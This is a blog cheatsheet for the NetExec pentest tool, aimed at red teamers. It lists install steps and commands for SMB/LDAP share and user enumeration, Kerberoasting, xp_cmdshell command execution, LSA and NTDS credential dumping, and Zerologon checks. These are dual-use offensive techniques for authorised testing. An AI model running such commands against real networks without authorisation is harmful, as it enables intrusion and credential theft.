Hacking Tools

NetExec Cheatsheet : A Comprehensive Guide

NetExec, also known as nxc, is a powerful network hacking tool designed to automate security assessments of large-scale networks.

It builds upon the legacy of CrackMapExec, offering enhanced functionality for penetration testers, red teamers, and cybersecurity professionals. Below is a detailed cheatsheet to help you utilize NetExec effectively.

To install NetExec:

bashsudo apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
netexec --version

The general syntax for NetExec commands:

bashnetexec <service> <target> -u <username> -p <password>

Example for SMB:

bashnetexec smb target -u username -p password
  • Null Authentication: netexec smb target -u '' -p ''
  • Guest Authentication: netexec smb target -u 'guest' -p ''
  • Kerberos Authentication: netexec smb target -u username -p password -k
  • Basic Enumeration: netexec smb target
  • List Shares: netexec smb target -u username -p password --shares
  • List Usernames: netexec smb target -u username -p password --users

Service-Specific Commands

SMB

  • All-in-One Enumeration: bashnetexec smb target -u username -p password --groups --users --shares --sessions
  • Extracting Files: bashnetexec smb target -u username -p password --get-file target_file output_file --share sharename

LDAP

  • User Enumeration: netexec ldap target -u '' -p '' --users
  • Kerberoasting: bashnetexec ldap target -u username -p password --kerberoasting hash.txt

MSSQL

  • Command Execution via xp_cmdshell: bashnetexec mssql target -u username -p password -x command_to_execute

FTP

  • List Files: netexec ftp target -u username -p password --ls

Credential Dumping

  • Secrets Dump: netexec smb target -u username -p password --lsa
  • NTDS Extraction: bashnetexec smb target -u username -p password --ntds

Check for vulnerabilities like Zerologon or PetitPotam:

bashnetexec smb target -u username -p password -M zerologon
  • Webdav Check: netexec smb target -u username -p password -M webdav
  • BloodHound Integration: bashnetexec ldap target -u username -p password --bloodhound

Explore the official NetExec Wiki and practice labs like HackTheBox’s Mist or Rebound to refine your skills.

This cheatsheet provides a quick reference to NetExec’s core functionalities, enabling efficient network enumeration, exploitation, and post-exploitation tasks.

Varshini

Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.

Recent Posts

PPLBlade: Advanced Memory Dumping and Obfuscation Tool

PPLBlade is a powerful Protected Process Dumper designed to capture memory from target processes, hide…

1 hour ago

HikPwn : Simple Scanner For Hikvision Devices With Basic Vulnerability Scanning

HikPwn: Comprehensive Guide to Scanning Hikvision Devices for Vulnerabilities If you’re searching for an efficient…

20 hours ago

Comments in Bash Scripts

What Are Bash Comments? Comments in Bash scripts, are notes in your code that the…

6 days ago

Shebang (#!) in Bash Script

When you write a Bash script in Linux, you want it to run correctly every…

7 days ago

Bash String Concatenation – Bash Scripting

Introduction If you’re new to Bash scripting, one of the first skills you’ll need is…

7 days ago

Learn Bash Scripting: How to Create and Run Shell Scripts for Beginners

What is Bash Scripting? Bash scripting allows you to save multiple Linux commands in a file and…

1 week ago